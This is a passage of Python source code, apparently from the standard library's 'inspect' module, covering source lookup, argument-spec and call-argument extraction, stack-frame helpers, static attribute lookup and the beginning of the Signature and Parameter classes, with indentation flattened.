raise TypeError('{!r} is not a module, class, method, '
'function, traceback, frame, or code object'.format(object))
ModuleInfo = namedtuple('ModuleInfo', 'name suffix mode module_type')
def getmoduleinfo(path):
"""Get the module name, suffix, mode, and module type for a given file."""
warnings.warn('inspect.getmoduleinfo() is deprecated', DeprecationWarning,
2)
filename = os.path.basename(path)
suffixes = [(-len(suffix), suffix, mode, mtype)
for suffix, mode, mtype in imp.get_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix, mode, mtype in suffixes:
if filename[neglen:] == suffix:
return ModuleInfo(filename[:neglen], suffix, mode, mtype)
def getmodulename(path):
"""Return the module name for a given file, or None."""
fname = os.path.basename(path)
# Check for paths that look like an actual module file
suffixes = [(-len(suffix), suffix)
for suffix in importlib.machinery.all_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix in suffixes:
if fname.endswith(suffix):
return fname[:neglen]
return None
def getsourcefile(object):
"""Return the filename that can be used to locate an object's source.
Return None if no way can be identified to get the source.
"""
filename = getfile(object)
all_bytecode_suffixes = importlib.machinery.DEBUG_BYTECODE_SUFFIXES[:]
all_bytecode_suffixes += importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES[:]
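    # If we were handed a byte-compiled file, point back at the matching
    # source file; compiled extension modules have no Python source at all.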
if any(filename.endswith(s) for s in all_bytecode_suffixes):
filename = (os.path.splitext(filename)[0] +
importlib.machinery.SOURCE_SUFFIXES[0])
elif any(filename.endswith(s) for s in
importlib.machinery.EXTENSION_SUFFIXES):
return None
if os.path.exists(filename):
return filename
# only return a non-existent filename if the module has a PEP 302 loader
if hasattr(getmodule(object, filename), '__loader__'):
return filename
# or it is in the linecache
if filename in linecache.cache:
return filename
def getabsfile(object, _filename=None):
"""Return an absolute path to the source or compiled file for an object.
The idea is for each object to have a unique origin, so this routine
normalizes the result as much as possible."""
if _filename is None:
_filename = getsourcefile(object) or getfile(object)
return os.path.normcase(os.path.abspath(_filename))
modulesbyfile = {}
_filesbymodname = {}
def getmodule(object, _filename=None):
"""Return the module an object was defined in, or None if not found."""
if ismodule(object):
return object
if hasattr(object, '__module__'):
return sys.modules.get(object.__module__)
# Try the filename to modulename cache
if _filename is not None and _filename in modulesbyfile:
return sys.modules.get(modulesbyfile[_filename])
# Try the cache again with the absolute file name
try:
file = getabsfile(object, _filename)
except TypeError:
return None
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Update the filename to module name cache and check yet again
# Copy sys.modules in order to cope with changes while iterating
for modname, module in list(sys.modules.items()):
if ismodule(module) and hasattr(module, '__file__'):
f = module.__file__
if f == _filesbymodname.get(modname, None):
# Have already mapped this module, so skip it
continue
_filesbymodname[modname] = f
f = getabsfile(module)
# Always map to the name the module knows itself by
modulesbyfile[f] = modulesbyfile[
os.path.realpath(f)] = module.__name__
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Check the main module
main = sys.modules['__main__']
if not hasattr(object, '__name__'):
return None
if hasattr(main, object.__name__):
mainobject = getattr(main, object.__name__)
if mainobject is object:
return main
# Check builtins
builtin = sys.modules['builtins']
if hasattr(builtin, object.__name__):
builtinobject = getattr(builtin, object.__name__)
if builtinobject is object:
return builtin
def findsource(object):
"""Return the entire source file and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of all the lines
in the file and the line number indexes a line in that list. An IOError
is raised if the source code cannot be retrieved."""
file = getfile(object)
sourcefile = getsourcefile(object)
if not sourcefile and file[:1] + file[-1:] != '<>':
raise IOError('source code not available')
file = sourcefile if sourcefile else file
module = getmodule(object, file)
if module:
lines = linecache.getlines(file, module.__dict__)
else:
lines = linecache.getlines(file)
if not lines:
raise IOError('could not get source code')
if ismodule(object):
return lines, 0
if isclass(object):
name = object.__name__
pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
# make some effort to find the best matching class definition:
# use the one with the least indentation, which is the one
# that's most probably not inside a function definition.
candidates = []
for i in range(len(lines)):
match = pat.match(lines[i])
if match:
# if it's at toplevel, it's already the best one
if lines[i][0] == 'c':
return lines, i
# else add whitespace to candidate list
candidates.append((match.group(1), i))
if candidates:
# this will sort by whitespace, and by line number,
# less whitespace first
candidates.sort()
return lines, candidates[0][1]
else:
raise IOError('could not find class definition')
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
if not hasattr(object, 'co_firstlineno'):
raise IOError('could not find function definition')
lnum = object.co_firstlineno - 1
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
while lnum > 0:
if pat.match(lines[lnum]): break
lnum = lnum - 1
return lines, lnum
raise IOError('could not find code object')
def getcomments(object):
"""Get lines of comments immediately preceding an object's source code.
Returns None when source can't be found.
"""
try:
lines, lnum = findsource(object)
except (IOError, TypeError):
return None
if ismodule(object):
# Look for a comment block at the top of the file.
start = 0
if lines and lines[0][:2] == '#!': start = 1
while start < len(lines) and lines[start].strip() in ('', '#'):
start = start + 1
if start < len(lines) and lines[start][:1] == '#':
comments = []
end = start
while end < len(lines) and lines[end][:1] == '#':
comments.append(lines[end].expandtabs())
end = end + 1
return ''.join(comments)
# Look for a preceding block of comments at the same indentation.
elif lnum > 0:
indent = indentsize(lines[lnum])
end = lnum - 1
if end >= 0 and lines[end].lstrip()[:1] == '#' and \
indentsize(lines[end]) == indent:
comments = [lines[end].expandtabs().lstrip()]
if end > 0:
end = end - 1
comment = lines[end].expandtabs().lstrip()
while comment[:1] == '#' and indentsize(lines[end]) == indent:
comments[:0] = [comment]
end = end - 1
if end < 0: break
comment = lines[end].expandtabs().lstrip()
while comments and comments[0].strip() == '#':
comments[:1] = []
while comments and comments[-1].strip() == '#':
comments[-1:] = []
return ''.join(comments)
class EndOfBlock(Exception): pass
class BlockFinder:
"""Provide a tokeneater() method to detect the end of a code block."""
def __init__(self):
self.indent = 0
self.islambda = False
self.started = False
self.passline = False
self.last = 1
def tokeneater(self, type, token, srowcol, erowcol, line):
if not self.started:
# look for the first "def", "class" or "lambda"
if token in ("def", "class", "lambda"):
if token == "lambda":
self.islambda = True
self.started = True
self.passline = True # skip to the end of the line
elif type == tokenize.NEWLINE:
self.passline = False # stop skipping when a NEWLINE is seen
self.last = srowcol[0]
if self.islambda: # lambdas always end at the first NEWLINE
raise EndOfBlock
elif self.passline:
pass
elif type == tokenize.INDENT:
self.indent = self.indent + 1
self.passline = True
elif type == tokenize.DEDENT:
self.indent = self.indent - 1
# the end of matching indent/dedent pairs end a block
# (note that this only works for "def"/"class" blocks,
# not e.g. for "if: else:" or "try: finally:" blocks)
if self.indent <= 0:
raise EndOfBlock
elif self.indent == 0 and type not in (tokenize.COMMENT, tokenize.NL):
# any other token on the same indentation level end the previous
# block as well, except the pseudo-tokens COMMENT and NL.
raise EndOfBlock
def getblock(lines):
"""Extract the block of code at the top of the given list of lines."""
blockfinder = BlockFinder()
try:
tokens = tokenize.generate_tokens(iter(lines).__next__)
for _token in tokens:
blockfinder.tokeneater(*_token)
except (EndOfBlock, IndentationError):
pass
return lines[:blockfinder.last]
def getsourcelines(object):
"""Return a list of source lines and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of the lines
corresponding to the object and the line number indicates where in the
original source file the first line of code was found. An IOError is
raised if the source code cannot be retrieved."""
lines, lnum = findsource(object)
if ismodule(object): return lines, 0
else: return getblock(lines[lnum:]), lnum + 1
def getsource(object):
"""Return the text of the source code for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a single string. An
IOError is raised if the source code cannot be retrieved."""
lines, lnum = getsourcelines(object)
return ''.join(lines)
# --------------------------------------------------- class tree extraction
def walktree(classes, children, parent):
"""Recursive helper function for getclasstree()."""
results = []
classes.sort(key=attrgetter('__module__', '__name__'))
for c in classes:
results.append((c, c.__bases__))
if c in children:
results.append(walktree(children[c], children, c))
return results
def getclasstree(classes, unique=False):
"""Arrange the given list of classes into a hierarchy of nested lists.
Where a nested list appears, it contains classes derived from the class
whose entry immediately precedes the list. Each entry is a 2-tuple
containing a class and a tuple of its base classes. If the 'unique'
argument is true, exactly one entry appears in the returned structure
for each class in the given list. Otherwise, classes using multiple
inheritance and their descendants will appear multiple times."""
children = {}
roots = []
for c in classes:
if c.__bases__:
for parent in c.__bases__:
if not parent in children:
children[parent] = []
if c not in children[parent]:
children[parent].append(c)
if unique and parent in classes: break
elif c not in roots:
roots.append(c)
for parent in children:
if parent not in classes:
roots.append(parent)
return walktree(roots, children, None)
# ------------------------------------------------ argument list extraction
Arguments = namedtuple('Arguments', 'args, varargs, varkw')
def getargs(co):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where
'args' is the list of argument names. Keyword-only arguments are
appended. 'varargs' and 'varkw' are the names of the * and **
arguments or None."""
args, varargs, kwonlyargs, varkw = _getfullargs(co)
return Arguments(args + kwonlyargs, varargs, varkw)
def _getfullargs(co):
"""Get information about the arguments accepted by a code object.
Four things are returned: (args, varargs, kwonlyargs, varkw), where
'args' and 'kwonlyargs' are lists of argument names, and 'varargs'
and 'varkw' are the names of the * and ** arguments or None."""
if not iscode(co):
raise TypeError('{!r} is not a code object'.format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount
args = list(names[:nargs])
kwonlyargs = list(names[nargs:nargs+nkwargs])
nargs += nkwargs
varargs = None
if co.co_flags & CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return args, varargs, kwonlyargs, varkw
ArgSpec = namedtuple('ArgSpec', 'args varargs keywords defaults')
def getargspec(func):
"""Get the names and default values of a function's arguments.
A tuple of four things is returned: (args, varargs, varkw, defaults).
'args' is a list of the argument names.
'args' will include keyword-only argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
Use the getfullargspec() API for Python-3000 code, as annotations
and keyword arguments are supported. getargspec() will raise ValueError
if the func has either annotations or keyword arguments.
"""
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = \
getfullargspec(func)
if kwonlyargs or ann:
raise ValueError("Function has keyword-only arguments or annotations"
", use getfullargspec() API which can support them")
return ArgSpec(args, varargs, varkw, defaults)
FullArgSpec = namedtuple('FullArgSpec',
'args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations')
def getfullargspec(func):
"""Get the names and default values of a function's arguments.
A tuple of seven things is returned:
    (args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
'kwonlyargs' is a list of keyword-only argument names.
'kwonlydefaults' is a dictionary mapping names from kwonlyargs to defaults.
'annotations' is a dictionary mapping argument names to annotations.
The first four items in the tuple correspond to getargspec().
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError('{!r} is not a Python function'.format(func))
args, varargs, kwonlyargs, varkw = _getfullargs(func.__code__)
return FullArgSpec(args, varargs, varkw, func.__defaults__,
kwonlyargs, func.__kwdefaults__, func.__annotations__)
ArgInfo = namedtuple('ArgInfo', 'args varargs keywords locals')
def getargvalues(frame):
"""Get information about arguments passed into a particular frame.
A tuple of four things is returned: (args, varargs, varkw, locals).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'locals' is the locals dictionary of the given frame."""
args, varargs, varkw = getargs(frame.f_code)
return ArgInfo(args, varargs, varkw, frame.f_locals)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def formatannotationrelativeto(object):
module = getattr(object, '__module__', None)
def _formatannotation(annotation):
return formatannotation(annotation, module)
return _formatannotation
def formatargspec(args, varargs=None, varkw=None, defaults=None,
kwonlyargs=(), kwonlydefaults={}, annotations={},
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value),
formatreturns=lambda text: ' -> ' + text,
formatannotation=formatannotation):
"""Format an argument spec from the values returned by getargspec
or getfullargspec.
The first seven arguments are (args, varargs, varkw, defaults,
    kwonlyargs, kwonlydefaults, annotations). The next six arguments
    are the corresponding optional formatting functions that are called to
    turn names and values into strings."""
def formatargandannotation(arg):
result = formatarg(arg)
if arg in annotations:
result += ': ' + formatannotation(annotations[arg])
return result
specs = []
if defaults:
firstdefault = len(args) - len(defaults)
for i, arg in enumerate(args):
spec = formatargandannotation(arg)
if defaults and i >= firstdefault:
spec = spec + formatvalue(defaults[i - firstdefault])
specs.append(spec)
if varargs is not None:
specs.append(formatvarargs(formatargandannotation(varargs)))
else:
if kwonlyargs:
specs.append('*')
if kwonlyargs:
for kwonlyarg in kwonlyargs:
spec = formatargandannotation(kwonlyarg)
if kwonlydefaults and kwonlyarg in kwonlydefaults:
spec += formatvalue(kwonlydefaults[kwonlyarg])
specs.append(spec)
if varkw is not None:
specs.append(formatvarkw(formatargandannotation(varkw)))
result = '(' + ', '.join(specs) + ')'
if 'return' in annotations:
result += formatreturns(formatannotation(annotations['return']))
return result
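# Illustrative example (added comment, not part of the original module):
#     formatargspec(*getfullargspec(lambda a, b=1, *c, d, **e: None))
# returns the string '(a, b=1, *c, d, **e)'.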
def formatargvalues(args, varargs, varkw, locals,
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value)):
"""Format an argument spec from the 4 values returned by getargvalues.
The first four arguments are (args, varargs, varkw, locals). The
next four arguments are the corresponding optional formatting functions
    that are called to turn names and values into strings."""
def convert(name, locals=locals,
formatarg=formatarg, formatvalue=formatvalue):
return formatarg(name) + formatvalue(locals[name])
specs = []
for i in range(len(args)):
specs.append(convert(args[i]))
if varargs:
specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))
if varkw:
specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))
return '(' + ', '.join(specs) + ')'
def _missing_arguments(f_name, argnames, pos, values):
names = [repr(name) for name in argnames if name not in values]
missing = len(names)
if missing == 1:
s = names[0]
elif missing == 2:
s = "{} and {}".format(*names)
else:
tail = ", {} and {}".format(names[-2:])
del names[-2:]
s = ", ".join(names) + tail
raise TypeError("%s() missing %i required %s argument%s: %s" %
(f_name, missing,
"positional" if pos else "keyword-only",
"" if missing == 1 else "s", s))
def _too_many(f_name, args, kwonly, varargs, defcount, given, values):
atleast = len(args) - defcount
kwonly_given = len([arg for arg in kwonly if arg in values])
if varargs:
plural = atleast != 1
sig = "at least %d" % (atleast,)
elif defcount:
plural = True
sig = "from %d to %d" % (atleast, len(args))
else:
plural = len(args) != 1
sig = str(len(args))
kwonly_sig = ""
if kwonly_given:
msg = " positional argument%s (and %d keyword-only argument%s)"
kwonly_sig = (msg % ("s" if given != 1 else "", kwonly_given,
"s" if kwonly_given != 1 else ""))
raise TypeError("%s() takes %s positional argument%s but %d%s %s given" %
(f_name, sig, "s" if plural else "", given, kwonly_sig,
"was" if given == 1 and not kwonly_given else "were"))
def getcallargs(func, *positional, **named):
"""Get the mapping of arguments to values.
A dict is returned, with keys the function argument names (including the
names of the * and ** arguments, if any), and values the respective bound
values from 'positional' and 'named'."""
spec = getfullargspec(func)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = spec
f_name = func.__name__
arg2value = {}
if ismethod(func) and func.__self__ is not None:
# implicit 'self' (or 'cls' for classmethods) argument
positional = (func.__self__,) + positional
num_pos = len(positional)
num_args = len(args)
num_defaults = len(defaults) if defaults else 0
n = min(num_pos, num_args)
for i in range(n):
arg2value[args[i]] = positional[i]
if varargs:
arg2value[varargs] = tuple(positional[n:])
possible_kwargs = set(args + kwonlyargs)
if varkw:
arg2value[varkw] = {}
for kw, value in named.items():
if kw not in possible_kwargs:
if not varkw:
raise TypeError("%s() got an unexpected keyword argument %r" %
(f_name, kw))
arg2value[varkw][kw] = value
continue
if kw in arg2value:
raise TypeError("%s() got multiple values for argument %r" %
(f_name, kw))
arg2value[kw] = value
if num_pos > num_args and not varargs:
_too_many(f_name, args, kwonlyargs, varargs, num_defaults,
num_pos, arg2value)
if num_pos < num_args:
req = args[:num_args - num_defaults]
for arg in req:
if arg not in arg2value:
_missing_arguments(f_name, req, True, arg2value)
for i, arg in enumerate(args[num_args - num_defaults:]):
if arg not in arg2value:
arg2value[arg] = defaults[i]
missing = 0
for kwarg in kwonlyargs:
if kwarg not in arg2value:
if kwarg in kwonlydefaults:
arg2value[kwarg] = kwonlydefaults[kwarg]
else:
missing += 1
if missing:
_missing_arguments(f_name, kwonlyargs, False, arg2value)
return arg2value
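# Illustrative example (added comment, not part of the original module): for
#     def f(a, b=1, *args, **kw): pass
# getcallargs(f, 1, 2, 3, x=4) returns
#     {'a': 1, 'b': 2, 'args': (3,), 'kw': {'x': 4}}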
ClosureVars = namedtuple('ClosureVars', 'nonlocals globals builtins unbound')
def getclosurevars(func):
"""
Get the mapping of free variables to their current values.
Returns a named tuple of dicts mapping the current nonlocal, global
and builtin references as seen by the body of the function. A final
set of unbound names that could not be resolved is also provided.
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError("'{!r}' is not a Python function".format(func))
code = func.__code__
# Nonlocal references are named in co_freevars and resolved
# by looking them up in __closure__ by positional index
if func.__closure__ is None:
nonlocal_vars = {}
else:
nonlocal_vars = {
var : cell.cell_contents
for var, cell in zip(code.co_freevars, func.__closure__)
}
# Global and builtin references are named in co_names and resolved
# by looking them up in __globals__ or __builtins__
global_ns = func.__globals__
builtin_ns = global_ns.get("__builtins__", builtins.__dict__)
if ismodule(builtin_ns):
builtin_ns = builtin_ns.__dict__
global_vars = {}
builtin_vars = {}
unbound_names = set()
for name in code.co_names:
if name in ("None", "True", "False"):
# Because these used to be builtins instead of keywords, they
# may still show up as name references. We ignore them.
continue
try:
global_vars[name] = global_ns[name]
except KeyError:
try:
builtin_vars[name] = builtin_ns[name]
except KeyError:
unbound_names.add(name)
return ClosureVars(nonlocal_vars, global_vars,
builtin_vars, unbound_names)
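# Illustrative example (added comment, not part of the original module): for a
# closure such as
#     def outer():
#         x = 1
#         def inner(): return len(str(x))
#         return inner
# getclosurevars(outer()) reports {'x': 1} as the nonlocals mapping and finds
# 'len' and 'str' in the builtins mapping.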
# -------------------------------------------------- stack frame extraction
Traceback = namedtuple('Traceback', 'filename lineno function code_context index')
def getframeinfo(frame, context=1):
"""Get information about a frame or traceback object.
A tuple of five things is returned: the filename, the line number of
the current line, the function name, a list of lines of context from
the source code, and the index of the current line within that list.
The optional second argument specifies the number of lines of context
to return, which are centered around the current line."""
if istraceback(frame):
lineno = frame.tb_lineno
frame = frame.tb_frame
else:
lineno = frame.f_lineno
if not isframe(frame):
raise TypeError('{!r} is not a frame or traceback object'.format(frame))
filename = getsourcefile(frame) or getfile(frame)
if context > 0:
start = lineno - 1 - context//2
try:
lines, lnum = findsource(frame)
except IOError:
lines = index = None
else:
start = max(start, 1)
start = max(0, min(start, len(lines) - context))
lines = lines[start:start+context]
index = lineno - 1 - start
else:
lines = index = None
return Traceback(filename, lineno, frame.f_code.co_name, lines, index)
def getlineno(frame):
"""Get the line number from a frame object, allowing for optimization."""
# FrameType.f_lineno is now a descriptor that grovels co_lnotab
return frame.f_lineno
def getouterframes(frame, context=1):
"""Get a list of records for a frame and all higher (calling) frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while frame:
framelist.append((frame,) + getframeinfo(frame, context))
frame = frame.f_back
return framelist
def getinnerframes(tb, context=1):
"""Get a list of records for a traceback's frame and all lower frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while tb:
framelist.append((tb.tb_frame,) + getframeinfo(tb, context))
tb = tb.tb_next
return framelist
def currentframe():
"""Return the frame of the caller or None if this is not possible."""
return sys._getframe(1) if hasattr(sys, "_getframe") else None
def stack(context=1):
"""Return a list of records for the stack above the caller's frame."""
return getouterframes(sys._getframe(1), context)
def trace(context=1):
"""Return a list of records for the stack below the current exception."""
return getinnerframes(sys.exc_info()[2], context)
# ------------------------------------------------ static version of getattr
_sentinel = object()
def _static_getmro(klass):
return type.__dict__['__mro__'].__get__(klass)
def _check_instance(obj, attr):
instance_dict = {}
try:
instance_dict = object.__getattribute__(obj, "__dict__")
except AttributeError:
pass
return dict.get(instance_dict, attr, _sentinel)
def _check_class(klass, attr):
for entry in _static_getmro(klass):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
return _sentinel
def _is_type(obj):
try:
_static_getmro(obj)
except TypeError:
return False
return True
def _shadowed_dict(klass):
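    # Walk the MRO looking for a '__dict__' entry that is not the standard
    # slot descriptor; if one is found, instance __dict__ lookups cannot be
    # trusted and the shadowing object is returned instead of _sentinel.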
dict_attr = type.__dict__["__dict__"]
for entry in _static_getmro(klass):
try:
class_dict = dict_attr.__get__(entry)["__dict__"]
except KeyError:
pass
else:
if not (type(class_dict) is types.GetSetDescriptorType and
class_dict.__name__ == "__dict__" and
class_dict.__objclass__ is entry):
return class_dict
return _sentinel
def getattr_static(obj, attr, default=_sentinel):
"""Retrieve attributes without triggering dynamic lookup via the
descriptor protocol, __getattr__ or __getattribute__.
Note: this function may not be able to retrieve all attributes
that getattr can fetch (like dynamically created attributes)
and may find attributes that getattr can't (like descriptors
that raise AttributeError). It can also return descriptor objects
instead of instance members in some cases. See the
documentation for details.
"""
instance_result = _sentinel
if not _is_type(obj):
klass = type(obj)
dict_attr = _shadowed_dict(klass)
if (dict_attr is _sentinel or
type(dict_attr) is types.MemberDescriptorType):
instance_result = _check_instance(obj, attr)
else:
klass = obj
klass_result = _check_class(klass, attr)
if instance_result is not _sentinel and klass_result is not _sentinel:
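        # Both the instance and the class provide a value: mirror normal
        # attribute lookup, where a data descriptor on the class (defining
        # both __get__ and __set__) wins over the instance __dict__ entry.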
if (_check_class(type(klass_result), '__get__') is not _sentinel and
_check_class(type(klass_result), '__set__') is not _sentinel):
return klass_result
if instance_result is not _sentinel:
return instance_result
if klass_result is not _sentinel:
return klass_result
if obj is klass:
# for types we check the metaclass too
for entry in _static_getmro(type(klass)):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
if default is not _sentinel:
return default
raise AttributeError(attr)
# ------------------------------------------------ generator introspection
GEN_CREATED = 'GEN_CREATED'
GEN_RUNNING = 'GEN_RUNNING'
GEN_SUSPENDED = 'GEN_SUSPENDED'
GEN_CLOSED = 'GEN_CLOSED'
def getgeneratorstate(generator):
"""Get current state of a generator-iterator.
Possible states are:
GEN_CREATED: Waiting to start execution.
GEN_RUNNING: Currently being executed by the interpreter.
GEN_SUSPENDED: Currently suspended at a yield expression.
GEN_CLOSED: Execution has completed.
"""
if generator.gi_running:
return GEN_RUNNING
if generator.gi_frame is None:
return GEN_CLOSED
if generator.gi_frame.f_lasti == -1:
return GEN_CREATED
return GEN_SUSPENDED
def getgeneratorlocals(generator):
"""
Get the mapping of generator local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
if not isgenerator(generator):
raise TypeError("'{!r}' is not a Python generator".format(generator))
frame = getattr(generator, "gi_frame", None)
if frame is not None:
return generator.gi_frame.f_locals
else:
return {}
###############################################################################
### Function Signature Object (PEP 362)
###############################################################################
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def _get_user_defined_method(cls, method_name):
try:
meth = getattr(cls, method_name)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
if not callable(obj):
raise TypeError('{!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
sig = signature(obj.__func__)
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {!r} has incorrect arguments'.format(obj)
raise ValueError(msg) from ex
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {!r} is not supported by signature'.format(obj))
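# Illustrative example (added comment, not part of the original module):
#     str(signature(lambda a, b=10: None))  ->  '(a, b=10)'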
class _void:
'''A private marker - used in Parameter & Signature'''
class _empty:
pass
class _ParameterKind(int):
def __new__(self, *args, name):
obj = int.__new__(self, *args)
obj._name = name
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter:
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, *, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not name.isidentifier():
msg = '{!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, *, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
